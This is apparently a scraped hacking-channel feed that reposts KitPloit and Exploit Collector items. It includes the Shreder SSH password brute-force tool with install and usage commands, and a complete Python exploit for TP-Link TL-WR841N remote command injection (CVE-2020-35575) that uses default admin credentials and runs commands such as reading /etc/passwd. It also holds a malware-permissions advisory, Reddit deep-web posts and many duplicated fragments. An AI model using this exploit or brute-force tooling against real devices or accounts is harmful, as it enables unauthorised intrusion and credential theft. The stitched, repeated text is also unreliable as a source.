Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Shreder - A Powerful Multi-Threaded SSH Protocol Password Bruteforce Tool
https://1.bp.blogspot.com/-LOYAT6i54D4/YNDy-S0CeiI/AAAAAAAAc4A/WruRy5N6vF8BIo4ewN68K0RWVQKhb2bOACNcBGAsYHQ/w640-h302/ssh_pass.png
Shreder is a powerful multi-threaded SSH protocol password brute-force tool.
Features
* Very fast password guessing, just one password in
* Optimized for big password lists, Shreder tries 1000 passwords in
* Simple CLI and API usage.
Installation
Basic usage
To use Shreder just type
bruteforce tool. positional arguments: target optional arguments: -h, --help show this help message and exit -p PORT, --port PORT SSH port. -u USERNAME, --username USERNAME SSH username. -l LIST, --list LIST Passwords list. ">
Examples
Brute-forcing single target
Let's brute-force my device just for fun.
API usage
Shreder also has their own Python API that can be invoked by importing Shreder to your code.
Basic functions
There are all Shreder basic functions that can be used to brute-force single target.
*
*
Examples
Brute-forcing single target
Download Shreder
Shreder - A Powerful Multi-Threaded SSH Protocol Password Bruteforce Tool
https://1.bp.blogspot.com/-LOYAT6i54D4/YNDy-S0CeiI/AAAAAAAAc4A/WruRy5N6vF8BIo4ewN68K0RWVQKhb2bOACNcBGAsYHQ/w640-h302/ssh_pass.png
Shreder is a powerful multi-threaded SSH protocol password brute-force tool.
Features
* Very fast password guessing, just one password in
0.1second.* Optimized for big password lists, Shreder tries 1000 passwords in
1minute and 40seconds.* Simple CLI and API usage.
Installation
pip3 install git+https://github.com/EntySec/ShrederBasic usage
To use Shreder just type
shrederin your terminal.bruteforce tool. positional arguments: target optional arguments: -h, --help show this help message and exit -p PORT, --port PORT SSH port. -u USERNAME, --username USERNAME SSH username. -l LIST, --list LIST Passwords list. ">
usage: shreder [-h] [-p PORT] [-u USERNAME] [-l LIST] target
Shreder is a powerful multi-threaded SSH protocol password bruteforce tool.
positional arguments:
target
optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT SSH port.
-u USERNAME, --username USERNAME
SSH username.
-l LIST, --list LIST Passwords list.
Examples
Brute-forcing single target
Let's brute-force my device just for fun.
shreder 192.168.2.109 -u mobile -l passwords.txtAPI usage
Shreder also has their own Python API that can be invoked by importing Shreder to your code.
from shreder import ShrederBasic functions
There are all Shreder basic functions that can be used to brute-force single target.
*
connect(host, port, username, password)- Connect single target by given address.*
brute(host, port, username, dictionary)- Brute-force single target by given address.Examples
Brute-forcing single target
from shreder import Shreder
shreder = Shreder()
password = shreder.brute(192.168.2.109, 22, 'mobile', 'passwords.txt')
print(password)Download Shreder
Deep Web
If there are alternatives to anonymous internet, how come Tor is getting so much attention
If there are alternatives to anonymous internet, how come Tor is getting so much attention
submitted by /u/dominic_l
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
If there are alternatives to anonymous internet, how come Tor is getting so much attention
If there are alternatives to anonymous internet, how come Tor is getting so much attention
submitted by /u/dominic_l
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
r/deepweb - If there are alternatives to anonymous internet, how come Tor is getting so much attention
3 votes and 1 comment so far on Reddit
Deep Web
Got a random text after surfing the deep web
I’ve surfed the deep web numerous times now. I never once leaked any information whatsoever and yesterday I received a random text with a link after surfing the web. I had only a few tabs opened at a time. How could this have happened? Should I be concerned? Could this just be a coincidence?
submitted by /u/orcawhale2
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Got a random text after surfing the deep web
I’ve surfed the deep web numerous times now. I never once leaked any information whatsoever and yesterday I received a random text with a link after surfing the web. I had only a few tabs opened at a time. How could this have happened? Should I be concerned? Could this just be a coincidence?
submitted by /u/orcawhale2
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
r/deepweb - Got a random text after surfing the deep web
1 vote and 6 comments so far on Reddit
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles
Wireless Penetration Testing: PMKID Attack
Introduction PMKID attack was developed by Team Hashcat. Unlike the traditional handshake capture method (4- way handshake), this method does not wait for a client to re-authenticate. PMKID is directly captured in these attacks and then cracked. This attack works on WPA and WPA2 protocols and recent studies have shown
The post Wireless Penetration Testing: PMKID Attack appeared first on Hacking Articles.
___________________________
@hacking_Attack
@Hacking_Video
Wireless Penetration Testing: PMKID Attack
Introduction PMKID attack was developed by Team Hashcat. Unlike the traditional handshake capture method (4- way handshake), this method does not wait for a client to re-authenticate. PMKID is directly captured in these attacks and then cracked. This attack works on WPA and WPA2 protocols and recent studies have shown
The post Wireless Penetration Testing: PMKID Attack appeared first on Hacking Articles.
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles
Wireless Penetration Testing: PMKID Attack
Learn how to perform a PMKID attack using hcxdumptool and Hashcat to crack WPA/WPA2 passwords in wireless penetration testing environments.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
TP-Link TL-WR841N Command Injection
https://4.bp.blogspot.com/-xhbT4GX8v9w/WWlvF89jtmI/AAAAAAAAILM/fSSkvnm11QwzZu21RJEqwX2S4icQcxCngCLcBGAs/s1600/h136.png
TP-Link TL-WR841N suffers from a remote command injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
TP-Link TL-WR841N Command Injection
https://4.bp.blogspot.com/-xhbT4GX8v9w/WWlvF89jtmI/AAAAAAAAILM/fSSkvnm11QwzZu21RJEqwX2S4icQcxCngCLcBGAs/s1600/h136.png
TP-Link TL-WR841N suffers from a remote command injection vulnerability.
MD5 |
6d752418204da4962328ae4dea40f269Download
# Exploit Title: TP-Link TL-WR841N - Command Injection
# Date: 2020-12-13
# Exploit Author: Koh You Liang
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip
# Version: TL-WR841N 0.9.1 4.0
# Tested on: Windows 10
# CVE : CVE-2020-35575
import requests
import sys
import time
try:
_ = sys.argv[2]
payload = ' '.join(sys.argv[1:])
except IndexError:
try:
payload = sys.argv[1]
except IndexError:
print("[*] Command not specified, using the default `cat etc/passwd=`")
payload = 'cat etc/passwd'
# Default credentials is admin:admin - replace with your own
cookies = {
'Authorization': 'Basic YWRtaW46YWRtaW4='
}
headers = {
'Host': '192.168.0.1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko=/20100101 Firefox/84.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'text/plain',
'Content-Length': '197',
'Origin': 'http://192.168.0.1',
'Connection': 'close',
'Referer': 'http://192.168.0.1/mainFrame.htm',
}
data1 = \
'''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\ntimeout=50\r\nnumberOfTries=1\r\nhost="`{}`"\r\ndataBlockSize=64\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\nX_TP_HopSeq=0\r\n'''.format(payload)
response1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False)
print('[+] Sending payload...')
try:
response1.text.splitlines()[0]
except IndexError:
sys.exit('[-] Cannot get response. Please check your cookie.')
if response1.text.splitlines()[0] != '[error]0':
sys.exit('[*] Router/Firmware is not vulnerable.')
data2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n'
response2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False)
print('[+] Receiving response from router...')
time.sleep(0.8) # Buffer time for traceroute to succeed
data3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\ndiagnosticsState\r\nX_TP_HopSeq\r\nX_TP_Result\r\n'''
response3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False)
if '=:' in response3.text.splitlines()[3]:
print('[-] Command not supported.')
else:
print('[+] Exploit successful!')
for line_number, line in enumerate(response3.text.splitlines()):
try:
if line_number == 3:
print(line[12:])
if line_number > 3 and line != '[error]0':
print(line)
if 'not known' in line:
break
except IndexError:
break
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
TP-Link TL-WR841N Command Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Adobe ColdFusion 8 Remote Command Execution
___________________________
@hacking_Attack
@Hacking_Video
Adobe ColdFusion 8 Remote Command Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Adobe ColdFusion 8 Remote Command Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan.Win32.SecondThought.ak Insecure Permissions
https://3.bp.blogspot.com/-WgHI0tg_gBA/WWlu6qiRwXI/AAAAAAAAIJQ/y7F9DyJjlcsOiH2i6j2FGMtA3ctyoL26QCLcBGAs/s1600/h109.png
Trojan.Win32.SecondThought.ak malware suffers from an insecure permissions vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Trojan.Win32.SecondThought.ak Insecure Permissions
https://3.bp.blogspot.com/-WgHI0tg_gBA/WWlu6qiRwXI/AAAAAAAAIJQ/y7F9DyJjlcsOiH2i6j2FGMtA3ctyoL26QCLcBGAs/s1600/h109.png
Trojan.Win32.SecondThought.ak malware suffers from an insecure permissions vulnerability.
MD5 |
8df458f0240ec6ab3bc6f0238286017aDownload
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/21cd8bab6b3569f7b375a69a37e36c50.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Trojan.Win32.SecondThought.ak
Vulnerability: Insecure Permissions
Description: The malware creates a dir with insecure permissions under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Type: PE32
MD5: 21cd8bab6b3569f7b375a69a37e36c50
Vuln ID: MVID-2021-0257
Dropped files: install113.exe
Disclosure: 06/23/2021
Exploit/PoC:
C:\>cacls temporary
C:\temporary BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
C:\>dir temporary
Volume in drive C has no label.
Directory of C:\temporary
06/16/2021 02:51 AM 0 install113.exe
1 File(s) 0 bytes
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Trojan.Win32.SecondThought.ak Insecure Permissions
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.